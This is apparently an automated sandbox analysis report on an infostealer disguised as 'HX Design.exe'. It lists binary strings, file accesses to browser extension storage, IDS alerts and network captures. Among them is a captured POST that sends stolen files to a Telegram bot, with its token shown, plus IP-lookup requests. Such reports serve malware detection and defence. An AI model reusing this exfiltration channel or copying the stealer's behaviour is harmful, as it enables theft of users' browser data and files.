Source:	Binary string: api-ms-win-core-handle-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1670069107.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1669582469.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-processthreads-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1670867826.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: HX Design.exe, 00000001.00000002.2110372375.00007FFE10301000.00000040.00000001.01000000.00000012.sdmp
Source:	Binary string: api-ms-win-core-fibers-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1669673863.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-file-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1669771704.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-synch-l1-2-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1671427459.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1672181668.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-process-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1672711559.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-util-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1672006597.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-datetime-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1669381520.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: HX Design.exe, 00000001.00000002.2112292200.00007FFE13301000.00000040.00000001.01000000.0000000A.sdmp
Source:	Binary string: api-ms-win-core-errorhandling-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1669582469.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ucrtbase.pdbUGP source: HX Design.exe, 00000001.00000002.2108765974.00007FFE01424000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: HX Design.exe, 00000001.00000002.2111882351.00007FFE13201000.00000040.00000001.01000000.0000000D.sdmp
Source:	Binary string: api-ms-win-crt-convert-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1672181668.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-stdio-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1672894743.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: HX Design.exe, 00000001.00000002.2104253662.00007FFDFAD87000.00000040.00000001.01000000.00000016.sdmp
Source:	Binary string: D:\a\1\b\libcrypto-3.pdb\| source: HX Design.exe, 00000001.00000002.2104758778.00007FFDFB1EA000.00000040.00000001.01000000.00000010.sdmp
Source:	Binary string: D:\a\1\b\libssl-3.pdbDD source: HX Design.exe, 00000001.00000002.2108169054.00007FFE00395000.00000040.00000001.01000000.00000011.sdmp
Source:	Binary string: api-ms-win-core-profile-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1671060451.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-file-l1-2-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1669865054.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1669381520.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1672094828.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: HX Design.exe, HX Design.exe, 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: api-ms-win-crt-math-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1672623593.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\libcrypto-3.pdb source: HX Design.exe, HX Design.exe, 00000001.00000002.2104758778.00007FFDFB1EA000.00000040.00000001.01000000.00000010.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\33ajg45c\33ajg45c.pdb source: powershell.exe, 00000028.00000002.1879970672.000001D183AA6000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-interlocked-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1670262264.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 00000049.00000002.1967359399.00007FF77D260000.00000002.00000001.01000000.00000024.sdmp, rar.exe, 00000049.00000000.1955536544.00007FF77D260000.00000002.00000001.01000000.00000024.sdmp
Source:	Binary string: api-ms-win-crt-locale-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1672530678.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1673205368.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1671919991.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-string-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1671253398.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-file-l2-1-0.pdb source: HX Design.exe, 00000000.00000003.1669963061.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WA source: HX Design.exe
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: HX Design.exe, 00000001.00000002.2110062071.00007FFE1025B000.00000040.00000001.01000000.00000009.sdmp
Source:	Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: HX Design.exe, 00000000.00000003.1670376660.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: HX Design.exe, 00000001.00000002.2111353721.00007FFE12E11000.00000040.00000001.01000000.00000013.sdmp
Source:	Binary string: api-ms-win-core-namedpipe-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1670667043.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-runtime-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1672807365.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-processthreads-l1-1-1.pdbGCTL source: HX Design.exe, 00000000.00000003.1670955519.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: HX Design.exe, 00000001.00000002.2109756879.00007FFE0EB41000.00000040.00000001.01000000.0000000B.sdmp
Source:	Binary string: api-ms-win-crt-conio-l1-1-0.pdbGCTL source: HX Design.exe, 00000000.00000003.1672094828.000001631A8D7000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\HX Design.exe	Code function: 0_2_00007FF7320683C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00007FF7320683C0
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 0_2_00007FF732069280 FindFirstFileExW,FindClose,	0_2_00007FF732069280
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 0_2_00007FF732081874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00007FF732081874
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FF732069280 FindFirstFileExW,FindClose,	1_2_00007FF732069280
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FF7320683C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	1_2_00007FF7320683C0
Source: C:\Users\user\Desktop\HX Design.exe	Code function: 1_2_00007FF732081874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	1_2_00007FF732081874
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D2146EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	73_2_00007FF77D2146EC
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D2588E0 FindFirstFileExA,	73_2_00007FF77D2588E0
Source: C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe	Code function: 73_2_00007FF77D20E21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,	73_2_00007FF77D20E21C

Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\	Jump to behavior
Source: C:\Users\user\Desktop\HX Design.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2857751 - Severity 1 - ETPRO MALWARE SynthIndi Loader Exfiltration Activity (POST) : 192.168.2.4:49760 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: Joe Sandbox View	IP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.3
Source: global traffic	HTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.3

Source: global traffic	DNS traffic detected: DNS query: blank-zlvej.in
Source: global traffic	DNS traffic detected: DNS query: ip-api.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown

HTTP traffic detected: POST /bot7941165298:AAE-cxddvAA5WE9BKSZYSVJTX3zwZRZqwIw/sendDocument HTTP/1.1Host: api.telegram.orgAccept-Encoding: identityContent-Length: 677534User-Agent: python-urllib3/2.2.3Content-Type: multipart/form-data; boundary=96c8c802dc2959601b7d52be2a215a8e

Source: HX Design.exe, 00000001.00000002.2101621757.00000294B52BC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://.../back.jpeg
Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1928927415.000076D800270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/1423136
Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1924238094.00002F040000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1924973398.000076D80000C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2162
Source: msedge.exe, 0000003B.00000002.1924973398.000076D80000C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2162v
Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1924238094.00002F040000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1924973398.000076D80000C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2517
Source: chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2517D
Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1928927415.000076D800270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/2970
Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3078
Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3205
Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3206
Source: chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3206N
Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1924238094.00002F040000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3452
Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1928927415.000076D800270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3498
Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3502
Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3577
Source: chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3577Z
Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3584
Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1924238094.00002F040000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1924973398.000076D80000C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3586
Source: chrome.exe, 0000003A.00000002.1924238094.00002F040000C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3586e
Source: msedge.exe, 0000003B.00000002.1924973398.000076D80000C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3586v
Source: msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3623
Source: msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3624
Source: msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3625
Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3832
Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3862
Source: chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3862r
Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3965
Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1928927415.000076D800270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3970
Source: chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3970J
Source: chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3970S
Source: msedge.exe, 0000003B.00000002.1928927415.000076D800270000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/3970v
Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1928927415.000076D800270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4324
Source: msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4384
Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1931084474.000076D8003E8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4405
Source: chrome.exe, 0000003A.00000002.1930893893.00002F04004A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4405x
Source: chrome.exe, 0000003A.00000002.1926370811.00002F04001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1924238094.00002F040000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000003A.00000002.1931237965.00002F04004EC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1924973398.000076D80000C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932087749.000076D800500000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4428
Source: msedge.exe, 0000003B.00000002.1924973398.000076D80000C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/4428v
